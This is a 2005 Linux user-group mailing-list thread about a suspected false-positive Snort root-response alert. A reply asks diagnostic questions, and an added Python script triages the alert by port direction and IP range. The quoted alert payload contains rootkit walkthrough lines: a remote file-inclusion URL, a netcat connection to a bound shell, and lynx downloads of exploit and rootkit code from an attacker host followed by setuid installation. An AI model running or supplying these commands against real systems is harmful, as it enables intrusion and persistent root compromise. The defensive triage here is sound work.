[wplug] Need help with a snort alert. Did my box get hacked?

Ken Rambler ken at ramblernet.com
Fri Oct 21 11:05:02 EDT 2005


Chris,

Are you using IPTABLES or SHOREWALL?
Do you have a wireless router on your LAN, and if so are you using wireless
encryption?
Was this message from your firewall or a machine behind it?
Which log contained the message?

At first glance this looks like a 404 entry from your HTTP log.
Ken

-----Original Message-----
From: wplug-bounces+ken=ramblernet.com at wplug.org
[mailto:wplug-bounces+ken=ramblernet.com at wplug.org] On Behalf Of Chris
Romano
Sent: Friday, October 21, 2005 9:13 AM
To: General user list
Subject: [wplug] Need help with a snort alert. Did my box get hacked?


I came in this morning and checked my snort alerts (morning routine), and
noticed the following:

ATTACK-RESPONSES id check returned root            2005-10-21 07:40:32
82.165.25.125:80             10.10.10.5:51949             TCP

Some background.  10.10.10.x is my dmz and 10.10.10.5 is a firewall/proxy
(Slack 10.1) that connects the 10.10.10.x to our 192.168.0.x internal
network.
So I started digging around. The alert logged the following:

SUCKIT v 1.1c - New, singing, dancing, world-smashing rewtkit  *.*
(c)oded by sd at sf.cz & devik at cdi.cz, 2001
Configuring ./sk:.OK!.[attacker at badass.cz ~/sk10]$ telnet lamehost.com
80.Trying 192.160.0.2.... Connected to lamehost.com..Escape character is
'^]'..GET /bighole.php3?inc=http://badass.cz/egg.php3 HTTP/1.1.Host:
lamehost.com ..HTTP/1.1 200 OK.Date: Thu, 18 Oct 2001 04:04:52 GMT.Server:
Apache/1.3.14 (Unix)  (Red-Hat/Linux) PHP/4.0.4pl1.Last-Modified: Fri, 28
Sep 2001 04:42:34 GMT.ETag: "31c6-c2-3bb3ffba".Content-Type:
text/html..IT WERKS! Shell at port 8193 Connection closed by foreign
host..[attacker at badass.cz~/sk10]$ nc -v lamehost.com 8193.lamehost.com
[192.168.0.2] 8193 (?) open.w.12:08am up  1:20,  3 users,  load average:
0.05, 0.06,0.08.USER     TTY      FROM    LOGIN at IDLE   JCPU   PCPU  AT.root
tty1     -  11:58pm 39:03   3.15s  2.95s  bash.cd /tmp.lynx -dump
http://badass.cz/s.c > s.c.gcc s.c o
super-duper-hacker-user-rooter../super-duper-hacker-user-rooter.id.uid=0(root)
gid=0(root) groups=0(root).cd /usr/local/man/man4.mkdir .l33t.cd
.l33t.lynx -dump http://badass.cz/~attacker/sk10/sk > sk.chmod+s+u sk../sk.* *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * *.*SUCKIT v1.1c -
New, singing, dancing, w

Ok, there are a few things that make me think that this is a false positive.
First is the "192.160.0.02" IP.  That is not on this network.  Second, there
is no host on 192.168.0.2.  Third, I do not have any Red Hat machines.  They
are all Slackware.  I am still concerned.  I searched for "sk" and all I
found are two directories related to vim, and I didn't find a directory
called "l33t".

Can anyone help me verify that I wasn't hacked?

Thanks,
Chris
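The alert in the post is worth a small worked triage, added here as an example; it is not code from the thread, from Snort, or from either poster. The script assumes that the rule's content match is the literal string `uid=0(root)` (the rule text itself is not quoted in the thread), that a source port in an assumed set of HTTP ports means the string was served as page content rather than produced by a command, takes the two local ranges (10.10.10.0/24 and 192.168.0.0/24) from the post, and runs over a constructed payload abridged from the one quoted above.

```python
#!/usr/bin/env python3
"""Triage a Snort "ATTACK-RESPONSES id check returned root" hit offline.

Added example for the thread above; not code from the original post or from
Snort. The content string, the HTTP port set and the local networks are
assumptions, labelled below.
"""
import ipaddress
import re

# Assumption: the rule keys on the literal output of `id` run as root, which
# is what the rule's name says it looks for. The rule text itself is not
# quoted in the thread.
ID_ROOT = b"uid=0(root)"

# Assumption: ports on which a *server's* reply is web content rather than
# the output of a command someone ran.
HTTP_PORTS = {80, 443, 8000, 8080}

# Local ranges named in the post: the DMZ and the internal LAN.
LOCAL_NETS = ["10.10.10.0/24", "192.168.0.0/24"]

# "MSG  YYYY-MM-DD HH:MM:SS  SRC:SPORT  DST:DPORT  PROTO", whitespace-normalised.
ALERT_RE = re.compile(
    r"^(?P<msg>.+?)\s+(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<proto>\w+)$"
)
IPV4_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample: the alert header from the post, and a payload abridged
# from the quoted one (the SuckIT readme that the proxy downloaded).
SAMPLE_ALERT = (
    "ATTACK-RESPONSES id check returned root            2005-10-21 07:40:32\n"
    "82.165.25.125:80             10.10.10.5:51949             TCP"
)
SAMPLE_PAYLOAD = (
    b"SUCKIT v 1.1c - New, singing, dancing, world-smashing rewtkit\n"
    b"$ telnet lamehost.com 80\nTrying 192.160.0.2... Connected to lamehost.com.\n"
    b"HTTP/1.1 200 OK\nServer: Apache/1.3.14 (Unix) (Red-Hat/Linux) PHP/4.0.4pl1\n"
    b"IT WERKS! Shell at port 8193\n$ nc -v lamehost.com 8193\n"
    b"lamehost.com [192.168.0.2] 8193 (?) open\nid\nuid=0(root) gid=0(root) groups=0(root)\n"
)


def parse_alert(line):
    """Split a Snort fast-format alert (possibly wrapped) into its fields."""
    m = ALERT_RE.match(" ".join(line.split()))
    if not m:
        raise ValueError("unrecognised alert line: %r" % line)
    fields = m.groupdict()
    fields["sport"] = int(fields["sport"])
    fields["dport"] = int(fields["dport"])
    return fields


def triage(alert_line, payload, local_nets=LOCAL_NETS):
    """Decide whether the matched string is command output or served content."""
    alert = parse_alert(alert_line)
    nets = [ipaddress.ip_network(n) for n in local_nets]
    matched = ID_ROOT in payload

    # Every IPv4 literal in the payload, sorted into "ours" and "not ours" so
    # the analyst can do the "is that host even on my network?" check quickly.
    local, foreign = [], []
    for raw in sorted({ip.decode() for ip in IPV4_RE.findall(payload)}):
        try:
            addr = ipaddress.ip_address(raw)
        except ValueError:  # e.g. an octet above 255
            continue
        (local if any(addr in n for n in nets) else foreign).append(raw)

    # Direction is the key signal: the alert's source is the side that sent
    # the string. A web server's port 80 sending it means the string was in
    # a page body; a shell or bound port sending it means `id` really ran.
    from_web_server = alert["sport"] in HTTP_PORTS
    if not matched:
        verdict = "no match"
    elif from_web_server:
        verdict = ("string arrived in a web server's response to %s:%d: page content, "
                   "not command output" % (alert["dst"], alert["dport"]))
    else:
        verdict = ("string sent by a non-HTTP service on %s:%d: treat as real command "
                   "output until proven otherwise" % (alert["src"], alert["sport"]))
    return {
        "src": alert["src"], "sport": alert["sport"],
        "dst": alert["dst"], "dport": alert["dport"],
        "matched": matched, "from_web_server": from_web_server,
        "local_ips_mentioned": local, "foreign_ips_mentioned": foreign,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ALERT, SAMPLE_PAYLOAD).items():
        print("%-22s %s" % (key, value))
```

On the sample the script reports the match, that it came from 82.165.25.125:80 to the proxy's ephemeral port, that 192.160.0.2 is outside both local ranges and 192.168.0.2 inside one, which is the same reasoning the poster did by hand. What it cannot decide is what the proxy fetched and on whose behalf; that needs the proxy's access log on 10.10.10.5 for 07:40:32, which is also where Ken's "which box, which log" questions lead.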

